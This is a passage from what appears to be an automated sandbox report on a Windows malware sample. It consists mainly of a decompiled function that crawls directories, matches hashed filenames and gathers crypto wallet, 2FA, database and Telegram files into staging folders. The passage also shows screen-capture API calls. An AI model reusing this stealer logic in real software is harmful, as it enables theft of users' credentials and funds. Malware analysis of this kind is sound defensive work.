                                                  • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004049CC
                                                  • SelectObject.GDI32(00000000,00000000), ref: 004049DE
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00404A03
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                    • Part of subcall function 00403D26: EnterCriticalSection.KERNEL32(004084D4,?,?), ref: 00403D38
                                                    • Part of subcall function 0040351E: GetProcessHeap.KERNEL32(00000000,00000000,00403026,?,?,?,?,?,?,?,?,?,?,?,004035DC,?), ref: 00403525
                                                    • Part of subcall function 0040351E: RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,004035DC,?,00000400,?), ref: 0040352C
                                                  • DeleteObject.GDI32(00000000), ref: 00404A9D
                                                  • DeleteDC.GDI32(00000000), ref: 00404AA4
                                                  • ReleaseDC.USER32 ref: 00404AAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Object$HeapSection$CriticalDelete$CreateEnterProcess$AllocateCallbackCompatibleCurrentDispatcherFreeHandleLeaveLibraryLoadMetricsModuleReleaseSelectSystemUser
                                                  • String ID: ($- ScreenSize: {lWidth=%d, lHeight=%d}$2$6$gdi3$gdi32
                                                  • API String ID: 1387450592-4111540656
                                                  • Opcode ID: e9d44fd7d4d727d46ae51d1360d3aa32c12e10f9a846aa79e8bcbac72c5deca9
                                                  • Instruction ID: 0dba1ea29456e54c154a4f85a3165c6553c312b31bc60dfa30d2f7dc54768a5e
                                                  • Opcode Fuzzy Hash: e9d44fd7d4d727d46ae51d1360d3aa32c12e10f9a846aa79e8bcbac72c5deca9
                                                  • Instruction Fuzzy Hash: 6A618072E40208ABDB10DFA5DD45BEEBBB9EF84710F10402AE605B72D1DB789A05CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401000 Relevance: 18.2, APIs: 4, Strings: 6, Instructions: 665fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 150 401000-401018 151 4012da-4012e0 150->151 152 40101e-401028 150->152 152->151 153 40102e-401037 call 40402b 152->153 153->151 156 40103d-401059 call 4034f0 * 2 153->156 161 4012cc-4012d5 call 40351e * 2 156->161 162 40105f-401061 156->162 161->151 162->161 163 401067-40116d call 4035e8 FindFirstFileW 162->163 169 401173-401192 call 403623 * 2 163->169 170 40129d-4012c9 call 40355e * 3 163->170 180 401282 169->180 181 401198-4011b7 call 4035e8 169->181 170->161 182 401285-401297 FindNextFileW 180->182 186 401759-401760 181->186 187 4011bd-4011cf call 403713 181->187 182->169 182->170 186->180 188 401766-401784 call 403623 call 403b10 186->188 187->186 192 4011d5-4011e7 call 403713 187->192 198 401786-4017d3 call 4034f0 call 4035e8 call 403e66 188->198 199 4017db-4017e0 188->199 192->186 200 4011ed-40120f call 403623 call 403b10 192->200 198->199 203 4017e6-4017eb 199->203 204 40198b-4019c2 call 4035e8 call 403e66 199->204 218 401215-40121b 200->218 219 4016c7-4016fc call 404068 200->219 203->204 208 4017f1-4017f6 203->208 220 4019c7-4019ca 204->220 208->204 212 4017fc-401801 208->212 212->204 216 401807-40180c 212->216 216->204 221 401812-401817 216->221 218->219 225 401221-401227 218->225 230 401702-40170d call 403713 219->230 231 40137c-401386 call 40351e 219->231 220->182 221->204 222 40181d-401822 221->222 222->204 226 401828-40182d 222->226 225->219 228 40122d-401233 225->228 226->204 229 401833-401838 226->229 232 401239-40123f 228->232 233 40169d-4016c2 EnterCriticalSection call 404abc LeaveCriticalSection 228->233 229->204 235 40183e-401843 229->235 230->231 246 401713-401754 call 403eaa 230->246 231->180 232->233 237 401245-40124b 232->237 233->180 235->204 241 401849-40184e 235->241 243 4012e1-4012e7 237->243 244 401251-40127c call 403eaa 237->244 241->180 245 401854-401868 call 404186 241->245 248 40138b-401391 243->248 249 4012ed-40130f call 404068 243->249 244->180 245->231 267 40186e-401873 245->267 246->231 251 401401-401407 248->251 252 401393-4013b5 call 404068 248->252 249->231 263 401311-40131c call 403713 249->263 256 401409-40142b call 404068 251->256 257 40143e-401444 251->257 270 4013f5-4013fc call 40351e 252->270 271 4013b7-4013c2 call 403713 252->271 256->270 275 40142d-401438 call 403713 256->275 265 401446 257->265 266 40144d-401453 257->266 263->231 283 40131e-40136f call 4034f0 call 4035e8 call 403e66 263->283 265->266 273 401455-40145c 266->273 274 401468-40146e 266->274 267->231 272 401879-401891 call 4036d9 267->272 270->180 271->270 292 4013c4 271->292 272->231 294 401897-4018af call 4036d9 272->294 273->274 280 401652-40167d call 404068 274->280 281 401474-40147a 274->281 275->270 296 40143a-40143c 275->296 280->270 299 401683-40168e call 403713 280->299 281->280 288 401480-401486 281->288 320 401375-401377 call 40351e 283->320 288->280 289 40148c-401492 288->289 289->280 295 401498-40149e 289->295 298 4013c6-4013ef call 403eaa 292->298 294->231 310 4018b5-4018cb call 403684 294->310 295->280 301 4014a4-4014aa 295->301 296->298 298->270 299->270 314 401694-401696 299->314 301->280 306 4014b0-4014b6 301->306 306->280 312 4014bc-4014c2 306->312 310->231 318 4018d1-4018dd call 40360d 310->318 312->280 316 4014c8-4014ce 312->316 314->233 316->280 319 4014d4-4014da 316->319 318->320 326 4018e3-4018f6 call 401a55 318->326 319->280 322 4014e0-4014e6 319->322 320->231 322->280 325 4014ec-4014f2 322->325 325->280 327 4014f8-4014fe 325->327 326->320 332 4018fc-401901 326->332 327->280 329 401504-40150a 327->329 329->280 331 401510-401516 329->331 331->280 333 40151c-401522 331->333 332->320 334 401907-401919 call 401c87 332->334 333->280 335 401528-40152e 333->335 341 40191b-401964 call 401b98 call 4035e8 call 403d26 334->341 342 40197e-401986 call 40351e 334->342 335->280 337 401534-40153a 335->337 337->280 339 401540-401546 337->339 339->280 340 40154c-401552 339->340 340->280 343 401558-40155e 340->343 355 401969-40197b call 40351e * 2 341->355 342->320 343->280 346 401564-40156a 343->346 346->280 349 401570-401576 346->349 349->280 352 40157c-401582 349->352 352->280 354 401588-40158e 352->354 354->280 356 401594-40159a 354->356 355->342 356->280 358 4015a0-4015a6 356->358 360 4015a8-4015ae 358->360 361 4015da-401602 call 404068 358->361 360->361 364 4015b0-4015b6 360->364 361->270 368 401608-401613 call 403713 361->368 364->361 367 4015b8-4015be 364->367 367->361 369 4015c0-4015c6 367->369 368->270 374 401619-40164d call 403eaa 368->374 369->361 371 4015c8-4015cf call 401000 369->371 375 4015d4-4015d5 371->375 374->270 375->180
                                                  C-Code - Quality: 89%
                                                  			E00401000(intOrPtr __ecx, intOrPtr __edx, signed short _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed short _v36;
				signed short _v40;
				void* _v44;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				char _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				char _v128;
				signed int _v132;
				char _v136;
				signed int _v140;
				char _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				short _v196;
				short _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				char _v208;
				short _v246;
				short _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				char _v260;
				struct _WIN32_FIND_DATAW _v856;
				short _t165;
				short _t166;
				short _t167;
				short _t168;
				short _t169;
				short _t171;
				short _t172;
				short _t173;
				short _t174;
				short _t175;
				short _t177;
				short _t178;
				short _t179;
				short _t180;
				void* _t184;
				void* _t188;
				void* _t189;
				int _t193;
				void* _t197;
				signed short _t206;
				signed short _t208;
				signed short _t211;
				signed short _t213;
				signed short _t214;
				short _t226;
				signed short _t236;
				signed short _t245;
				signed short _t252;
				signed short _t260;
				short _t265;
				signed short _t273;
				signed short _t276;
				intOrPtr _t277;
				signed short _t278;
				short _t285;
				short _t286;
				short _t287;
				signed int _t321;
				signed short _t350;
				char* _t360;
				short _t378;
				WCHAR* _t391;
				void* _t406;
				signed short _t412;
				intOrPtr _t413;
				WCHAR* _t422;
				signed short _t426;
				void* _t430;
				void* _t432;
				void* _t433;

				_t277 = __ecx;
				_t160 = __edx;
				_v28 = __edx;
				_v20 = __ecx;
				if(__ecx == 0 ||  *0x40802c == 0x81f39c19) {
					L22:
					return _t160;
				} else {
					_t160 = E0040402B(__edx);
					if(__edx == 0) {
						goto L22;
					}
					_t422 = E004034F0(0x208);
					_t424 = E004034F0(0x208);
					_v12 = _t424;
					if(_t422 == 0) {
						L21:
						E0040351E(_t422);
						return E0040351E(_t424);
					}
					_t441 = _t424;
					if(_t424 == 0) {
						goto L21;
					}
					_t165 = 0x32;
					_v260 = _t165;
					_t166 = 0x46;
					_v258 = _t166;
					_t167 = 0x41;
					_v256 = _t167;
					_t168 = 0x75;
					_t378 = 0x74;
					_v254 = _t168;
					_t169 = 0x68;
					_t285 = 0x2f;
					_v250 = _t169;
					_v246 = 0;
					_t171 = 0x43;
					_v96 = _t171;
					_t172 = 0x72;
					_v94 = _t172;
					_t173 = 0x79;
					_v92 = _t173;
					_t174 = 0x70;
					_v90 = _t174;
					_t175 = 0x6f;
					_v86 = _t175;
					_v82 = 0;
					_t177 = 0x44;
					_v248 = _t285;
					_v84 = _t285;
					_t286 = 0x61;
					_v208 = _t177;
					_t178 = 0x62;
					_v206 = _t286;
					_v202 = _t286;
					_v198 = _t286;
					_t287 = 0x73;
					_v200 = _t178;
					_t179 = 0x65;
					_v194 = _t179;
					_t180 = 0x2f;
					_v190 = _t180;
					_v252 = _t378;
					_v88 = _t378;
					_v204 = _t378;
					_v196 = _t287;
					_v192 = _t287;
					_v188 = 0;
					E004035E8(_t441, _t422, L"%s\\*", _v28);
					_t433 = _t432 + 0xc;
					_t184 = FindFirstFileW(_t422,  &_v856); // executed
					_v44 = _t184;
					if(_t184 == 0xffffffff) {
						L20:
						E0040355E( &_v208, 0, 0x32);
						E0040355E( &_v260, 0, 0x32);
						E0040355E( &_v96, 0, 0x32);
						goto L21;
					} else {
						goto L6;
					}
					do {
						L6:
						_t188 = E00403623(_v28);
						_t189 = E00403623( &(_v856.cFileName));
						_t443 = _t189 + 3 + _t188 - 0x104;
						if(_t189 + 3 + _t188 >= 0x104) {
							L18:
							_t424 = _v12;
							goto L19;
						}
						_push( &(_v856.cFileName));
						E004035E8(_t443, _t422, L"%s\\%s", _v28);
						_t433 = _t433 + 0x10;
						if((_v856.dwFileAttributes & 0x00000010) == 0 || E00403713( &(_v856.cFileName), L"..") == 0 || E00403713( &(_v856.cFileName), ".") == 0) {
							__eflags = _v856.dwFileAttributes & 0x000000a7;
							if((_v856.dwFileAttributes & 0x000000a7) == 0) {
								goto L18;
							}
							_t197 = E00403B10( &(_v856.cFileName), E00403623( &(_v856.cFileName)) + _t196);
							__eflags = _t197 - 0xe982779a;
							if(_t197 != 0xe982779a) {
								__eflags = _t197 - 0x6666aed0;
								if(_t197 == 0x6666aed0) {
									L113:
									__eflags = _a4;
									_t424 = _v12;
									_t296 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
									_t199 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
									_t200 = (( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) + 1;
									_push( &(_t422[(( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) + 1]));
									E004035E8(__eflags, _v12, L"%s%s",  &_v208);
									E00403E66(_t277, _t422, __eflags, _t424); // executed
									_t433 = _t433 + 0x14;
									goto L19;
								}
								__eflags = _t197 - 0x3cd9c812;
								if(_t197 == 0x3cd9c812) {
									goto L113;
								}
								__eflags = _t197 - 0xdc914064;
								if(_t197 == 0xdc914064) {
									goto L113;
								}
								__eflags = _t197 - 0xac951682;
								if(_t197 == 0xac951682) {
									goto L113;
								}
								__eflags = _t197 - 0xaffeac1b;
								if(_t197 == 0xaffeac1b) {
									goto L113;
								}
								__eflags = _t197 - 0x775d28f9;
								if(_t197 == 0x775d28f9) {
									goto L113;
								}
								__eflags = _t197 - 0x8734ec8c;
								if(_t197 == 0x8734ec8c) {
									goto L113;
								}
								__eflags = _t197 - 0x7d9821e0;
								if(_t197 == 0x7d9821e0) {
									goto L113;
								}
								__eflags = _t197 - 0x4b9eec12;
								if(_t197 == 0x4b9eec12) {
									goto L113;
								}
								__eflags = _t197 - 0x50a36ede;
								if(_t197 == 0x50a36ede) {
									goto L113;
								}
								__eflags = _t197 - 0xb525bd34;
								if(__eflags != 0) {
									goto L18;
								}
								_v16 = _v16 & 0x00000000;
								_t206 = E00404186(__eflags, _t422,  &_v16); // executed
								_t278 = _t206;
								__eflags = _t278;
								if(_t278 == 0) {
									goto L29;
								}
								_t426 = _v16;
								__eflags = _t426;
								if(_t426 == 0) {
									goto L29;
								}
								_push(_t426);
								_push(0x344ce79b);
								_t406 = 0x11;
								_t208 = E004036D9(_t278, _t406);
								_v24 = _t208;
								__eflags = _t208 - 0xffffffff;
								if(_t208 == 0xffffffff) {
									goto L29;
								}
								_t134 = _t208 + 0x11; // 0x11
								__eflags = E004036D9(_t134 + _t278, 1, 0x762ae69, _t426) - 0xffffffff;
								if(__eflags == 0) {
									goto L29;
								}
								_t427 = E00403684(_t278, _v24 + 0x11, __eflags, _t209);
								_v36 = _t427;
								__eflags = _t427;
								if(_t427 == 0) {
									goto L29;
								}
								_t211 = E0040360D(_t427);
								_v24 = _t211;
								__eflags = _t211;
								if(_t211 != 0) {
									_t213 = E00401A55(_t427, _t211,  &_v24);
									_v40 = _t213;
									__eflags = _t213;
									if(_t213 != 0) {
										_t412 = _v24;
										__eflags = _t412;
										if(_t412 != 0) {
											_t413 = _t412 + 0xfffffffb;
											_t141 = _t213 + 5; // 0x5, executed
											_t214 = E00401C87(_t141, _t413); // executed
											_t316 = _t413;
											_v32 = _t413;
											__eflags = _t214;
											if(_t214 != 0) {
												_t428 = E00401B98(_t316, _t214,  &_v24);
												__eflags = _a4;
												_t417 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
												_t320 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
												_t321 = (( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) + 1;
												__eflags = _t321;
												_push( &(_t422[_t321]));
												E004035E8(_t321, _v12, L"%s%s",  &_v208);
												E00403D26(_v20, _v12, _t216, _v24); // executed
												_t433 = _t433 + 0x18;
												E0040351E(_t428);
												E0040351E(_v32);
												_t427 = _v36;
											}
											E0040351E(_v40);
										}
									}
								}
								goto L28;
							}
							_t429 = E004034F0(0x208);
							__eflags = _a4;
							_v84 = 0;
							_t420 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
							_t328 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
							_push( &(_t422[( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff]));
							E004035E8(__eflags, _t222, L"%s%s",  &_v96);
							_t226 = 0x2f;
							_v84 = _t226;
							E00403E66(_t277, _t422, __eflags, _t429);
							_t433 = _t433 + 0x14;
							goto L36;
						} else {
							_t430 = E00403B10( &(_v856.cFileName), E00403623( &(_v856.cFileName)) + _t231);
							if(_t430 == 0x82dfed94 || _t430 == 0xbd47e091 || _t430 == 0x44b776ce) {
								_v148 = _v148 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v156 = 0x3d3f6137;
								_v152 = 0x3887818b;
								_t278 = E00404068( &_v156, _t422,  &_v16);
								__eflags = _t278;
								if(_t278 != 0) {
									_t236 = E00403713(_t278, _t422);
									__eflags = _t236;
									if(_t236 != 0) {
										__eflags = _t430 - 0x44b776ce;
										_t238 =  !=  ?  &_v96 :  &_v260;
										__eflags = _a4;
										_t341 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
										_t240 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
										E00403EAA(_v20, _t278, _a4, ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff,  !=  ?  &_v96 :  &_v260, 0);
										_t433 = _t433 + 0xc;
										 *0x4084ca =  *0x4084ca + 1;
									}
								}
								goto L29;
							} else {
								if(_t430 == 0x23f2e218 || _t430 == 0x2d3640ab) {
									EnterCriticalSection(0x4084d4);
									E00404ABC(_t277, _t422, 1, L"Telegram");
									LeaveCriticalSection(0x4084d4);
									goto L18;
								} else {
									if(_t430 != 0xaf49b59a) {
										__eflags = _t430 - 0x141f21c1;
										if(_t430 != 0x141f21c1) {
											__eflags = _t430 - 0x6831c465;
											if(_t430 != 0x6831c465) {
												__eflags = _t430 - 0xbe7c0422;
												if(_t430 != 0xbe7c0422) {
													__eflags = _t430 - 0x19079238;
													if(__eflags != 0) {
														__eflags = _t430 - 0xcd9ab43c;
														if(_t430 != 0xcd9ab43c) {
															__eflags = _t430 - 0x21b1b4ad;
															if(_t430 == 0x21b1b4ad) {
																L81:
																_v140 = _v140 & 0x00000000;
																_v16 = _v16 & 0x00000000;
																_v144 = 0x18d008be;
																_t429 = E00404068( &_v144, _t422,  &_v16);
																__eflags = _t429;
																if(_t429 == 0) {
																	L37:
																	E0040351E(_t429);
																	goto L18;
																}
																_t245 = E00403713(_t429, _t422);
																__eflags = _t245;
																if(_t245 == 0) {
																	goto L37;
																}
																_push(0);
																_t391 = _t422;
																L35:
																__eflags = _a4;
																_push( &_v96);
																_t350 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
																__eflags = _t350;
																_push(_t350 & 0x0000ffff);
																E00403EAA(_t277, _t391, _t350);
																_t433 = _t433 + 0xc;
																L36:
																 *0x4084ca =  *0x4084ca + 1;
																__eflags =  *0x4084ca;
																goto L37;
															}
															__eflags = _t430 - 0xdf87581d;
															if(_t430 == 0xdf87581d) {
																goto L81;
															}
															__eflags = _t430 - 0x84355a31;
															if(_t430 == 0x84355a31) {
																goto L81;
															}
															__eflags = _t430 - 0xbe0fa81d;
															if(_t430 == 0xbe0fa81d) {
																goto L81;
															}
															__eflags = _t430 - 0x2bc5986f;
															if(_t430 == 0x2bc5986f) {
																goto L81;
															}
															__eflags = _t430 - 0x7d0d23c0;
															if(_t430 == 0x7d0d23c0) {
																goto L81;
															}
															__eflags = _t430 - 0x1f654090;
															if(_t430 == 0x1f654090) {
																goto L81;
															}
															__eflags = _t430 - 0xdf079535;
															if(_t430 == 0xdf079535) {
																goto L81;
															}
															__eflags = _t430 - 0x4135d5fc;
															if(_t430 == 0x4135d5fc) {
																goto L81;
															}
															__eflags = _t430 - 0x6e81e3ce;
															if(_t430 == 0x6e81e3ce) {
																goto L81;
															}
															__eflags = _t430 - 0x724ce424;
															if(_t430 == 0x724ce424) {
																goto L81;
															}
															__eflags = _t430 - 0x8764d8e1;
															if(_t430 == 0x8764d8e1) {
																goto L81;
															}
															__eflags = _t430 - 0x6b80d435;
															if(_t430 == 0x6b80d435) {
																goto L81;
															}
															__eflags = _t430 - 0x29244fc;
															if(_t430 == 0x29244fc) {
																goto L81;
															}
															__eflags = _t430 - 0x53c2254f;
															if(_t430 == 0x53c2254f) {
																goto L81;
															}
															__eflags = _t430 - 0xc29e566f;
															if(_t430 == 0xc29e566f) {
																goto L81;
															}
															__eflags = _t430 - 0x2acb08f2;
															if(_t430 == 0x2acb08f2) {
																goto L81;
															}
															__eflags = _t430 - 0xa583b0fd;
															if(_t430 == 0xa583b0fd) {
																goto L81;
															}
															__eflags = _t430 - 0x61a97737;
															if(_t430 == 0x61a97737) {
																goto L81;
															}
															__eflags = _t430 - 0x3af7e50b;
															if(_t430 == 0x3af7e50b) {
																goto L81;
															}
															__eflags = _t430 - 0xcd7ced7f;
															if(_t430 == 0xcd7ced7f) {
																goto L81;
															}
															__eflags = _t430 - 0x64febc18;
															if(_t430 == 0x64febc18) {
																goto L81;
															}
															__eflags = _t430 - 0x66177b21;
															if(_t430 == 0x66177b21) {
																goto L81;
															}
															__eflags = _t430 - 0xa09997a2;
															if(_t430 == 0xa09997a2) {
																goto L81;
															}
															__eflags = _t430 - 0x4d97bd74;
															if(_t430 == 0x4d97bd74) {
																goto L81;
															}
															__eflags = _t430 - 0xf1153a3a;
															if(_t430 == 0xf1153a3a) {
																goto L81;
															}
															__eflags = _t430 - 0xcce92e05;
															if(_t430 == 0xcce92e05) {
																L78:
																_v132 = _v132 & 0x00000000;
																_v16 = _v16 & 0x00000000;
																_v136 = 0x18d008be;
																_t429 = E00404068( &_v136, _t422,  &_v16);
																__eflags = _t429;
																if(_t429 != 0) {
																	_t252 = E00403713(_t429, _t422);
																	__eflags = _t252;
																	if(_t252 != 0) {
																		__eflags = _a4;
																		_t356 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
																		_t255 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
																		E00403EAA(_t277, _t422, _a4, ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff,  &_v260, 0);
																		_t433 = _t433 + 0xc;
																		 *0x4084cb =  *0x4084cb + 1;
																	}
																}
																goto L37;
															}
															__eflags = _t430 - 0x57e5dfea;
															if(_t430 == 0x57e5dfea) {
																goto L78;
															}
															__eflags = _t430 - 0xebf178e0;
															if(_t430 == 0xebf178e0) {
																goto L78;
															}
															__eflags = _t430 - 0x79349ba;
															if(_t430 == 0x79349ba) {
																goto L78;
															}
															__eflags = _t430 - 0xd26e760f;
															if(_t430 == 0xd26e760f) {
																goto L78;
															}
															E00401000(_t277, _t422, _a4); // executed
															goto L18;
														}
														_v124 = _v124 & 0x00000000;
														_t360 =  &_v128;
														_v128 = 0xbe1ba190;
														goto L25;
													} else {
														_push(1);
														goto L17;
													}
												}
												_v116 = _v116 & 0x00000000;
												_v16 = _v16 & 0x00000000;
												_v120 = 0x211f03d4;
												_t429 = E00404068( &_v120, _t422,  &_v16);
												__eflags = _t429;
												if(_t429 == 0) {
													goto L37;
												}
												_t273 = E00403713(_t429, _t422);
												__eflags = _t273;
												if(_t273 == 0) {
													goto L37;
												} else {
													_push(1);
													L34:
													_t391 = _t429;
													goto L35;
												}
											}
											_v108 = _v108 & 0x00000000;
											_v16 = _v16 & 0x00000000;
											_v112 = 0x2bc65cc5;
											_t429 = E00404068( &_v112, _t422,  &_v16);
											__eflags = _t429;
											if(_t429 == 0) {
												goto L37;
											}
											_t276 = E00403713(_t429, _t422);
											__eflags = _t276;
											if(_t276 == 0) {
												goto L37;
											} else {
												_push(0);
												goto L34;
											}
										} else {
											_t53 =  &_v100;
											 *_t53 = _v100 & 0x00000000;
											__eflags =  *_t53;
											_t360 =  &_v104;
											_v104 = 0x4dae58fd;
											L25:
											_v16 = _v16 & 0x00000000;
											_t278 = E00404068(_t360, _t422,  &_v16);
											__eflags = _t278;
											if(_t278 == 0) {
												L29:
												E0040351E(_t278);
												_t277 = _v20;
												goto L18;
											}
											_t260 = E00403713(_t278, _t422);
											__eflags = _t260;
											if(_t260 != 0) {
												_t427 = E004034F0(0x208);
												__eflags = _a4;
												_v84 = 0;
												_t399 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
												_t365 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
												_push(_t278 + (( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) * 2);
												E004035E8(__eflags, _t261, L"%s%s",  &_v96);
												_t265 = 0x2f;
												_v84 = _t265;
												E00403E66(_v20, _t278, __eflags, _t427);
												_t433 = _t433 + 0x14;
												 *0x4084ca =  *0x4084ca + 1;
												__eflags =  *0x4084ca;
												L28:
												E0040351E(_t427);
											}
											goto L29;
										}
									} else {
										_push(0);
										L17:
										_push( &_v96);
										_t369 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
										_t269 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
										_push(( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff);
										E00403EAA(_t277, _t422, _a4);
										_t433 = _t433 + 0xc;
										 *0x4084ca =  *0x4084ca + 1;
										goto L18;
									}
								}
							}
						}
						L19:
						_t193 = FindNextFileW(_v44,  &_v856); // executed
					} while (_t193 != 0);
					goto L20;
				}
			}









































































































                                                  0x0040100a
                                                  0x0040100c
                                                  0x0040100e
                                                  0x00401011
                                                  0x00401018
                                                  0x004012e0
                                                  0x004012e0
                                                  0x0040102e
                                                  0x00401030
                                                  0x00401037
                                                  0x00000000
                                                  0x00000000
                                                  0x0040104b
                                                  0x00401052
                                                  0x00401054
                                                  0x00401059
                                                  0x004012cc
                                                  0x004012ce
                                                  0x00000000
                                                  0x004012d5
                                                  0x0040105f
                                                  0x00401061
                                                  0x00000000
                                                  0x00000000
                                                  0x00401069
                                                  0x0040106c
                                                  0x00401073
                                                  0x00401076
                                                  0x0040107d
                                                  0x00401080
                                                  0x00401087
                                                  0x0040108a
                                                  0x0040108d
                                                  0x00401094
                                                  0x00401097
                                                  0x0040109a
                                                  0x004010a3
                                                  0x004010aa
                                                  0x004010ad
                                                  0x004010b1
                                                  0x004010b4
                                                  0x004010b8
                                                  0x004010bb
                                                  0x004010bf
                                                  0x004010c2
                                                  0x004010c6
                                                  0x004010c9
                                                  0x004010cf
                                                  0x004010d3
                                                  0x004010d6
                                                  0x004010dd
                                                  0x004010e1
                                                  0x004010e4
                                                  0x004010eb
                                                  0x004010ee
                                                  0x004010f5
                                                  0x004010fc
                                                  0x00401103
                                                  0x00401106
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401117
                                                  0x0040111b
                                                  0x0040112a
                                                  0x00401131
                                                  0x00401135
                                                  0x0040113c
                                                  0x00401143
                                                  0x0040114a
                                                  0x00401151
                                                  0x00401156
                                                  0x00401161
                                                  0x00401167
                                                  0x0040116d
                                                  0x0040129d
                                                  0x004012a7
                                                  0x004012b7
                                                  0x004012c4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00401173
                                                  0x00401173
                                                  0x00401176
                                                  0x00401183
                                                  0x0040118d
                                                  0x00401192
                                                  0x00401282
                                                  0x00401282
                                                  0x00000000
                                                  0x00401282
                                                  0x0040119e
                                                  0x004011a8
                                                  0x004011ad
                                                  0x004011b7
                                                  0x00401759
                                                  0x00401760
                                                  0x00000000
                                                  0x00000000
                                                  0x0040177a
                                                  0x0040177f
                                                  0x00401784
                                                  0x004017db
                                                  0x004017e0
                                                  0x0040198b
                                                  0x00401999
                                                  0x0040199d
                                                  0x004019a0
                                                  0x004019a3
                                                  0x004019a6
                                                  0x004019aa
                                                  0x004019b8
                                                  0x004019c2
                                                  0x004019c7
                                                  0x00000000
                                                  0x004019c7
                                                  0x004017e6
                                                  0x004017eb
                                                  0x00000000
                                                  0x00000000
                                                  0x004017f1
                                                  0x004017f6
                                                  0x00000000
                                                  0x00000000
                                                  0x004017fc
                                                  0x00401801
                                                  0x00000000
                                                  0x00000000
                                                  0x00401807
                                                  0x0040180c
                                                  0x00000000
                                                  0x00000000
                                                  0x00401812
                                                  0x00401817
                                                  0x00000000
                                                  0x00000000
                                                  0x0040181d
                                                  0x00401822
                                                  0x00000000
                                                  0x00000000
                                                  0x00401828
                                                  0x0040182d
                                                  0x00000000
                                                  0x00000000
                                                  0x00401833
                                                  0x00401838
                                                  0x00000000
                                                  0x00000000
                                                  0x0040183e
                                                  0x00401843
                                                  0x00000000
                                                  0x00000000
                                                  0x00401849
                                                  0x0040184e
                                                  0x00000000
                                                  0x00000000
                                                  0x00401854
                                                  0x0040185d
                                                  0x00401862
                                                  0x00401866
                                                  0x00401868
                                                  0x00000000
                                                  0x00000000
                                                  0x0040186e
                                                  0x00401871
                                                  0x00401873
                                                  0x00000000
                                                  0x00000000
                                                  0x00401879
                                                  0x0040187a
                                                  0x00401881
                                                  0x00401884
                                                  0x00401889
                                                  0x0040188e
                                                  0x00401891
                                                  0x00000000
                                                  0x00000000
                                                  0x00401897
                                                  0x004018ac
                                                  0x004018af
                                                  0x00000000
                                                  0x00000000
                                                  0x004018c3
                                                  0x004018c5
                                                  0x004018c9
                                                  0x004018cb
                                                  0x00000000
                                                  0x00000000
                                                  0x004018d3
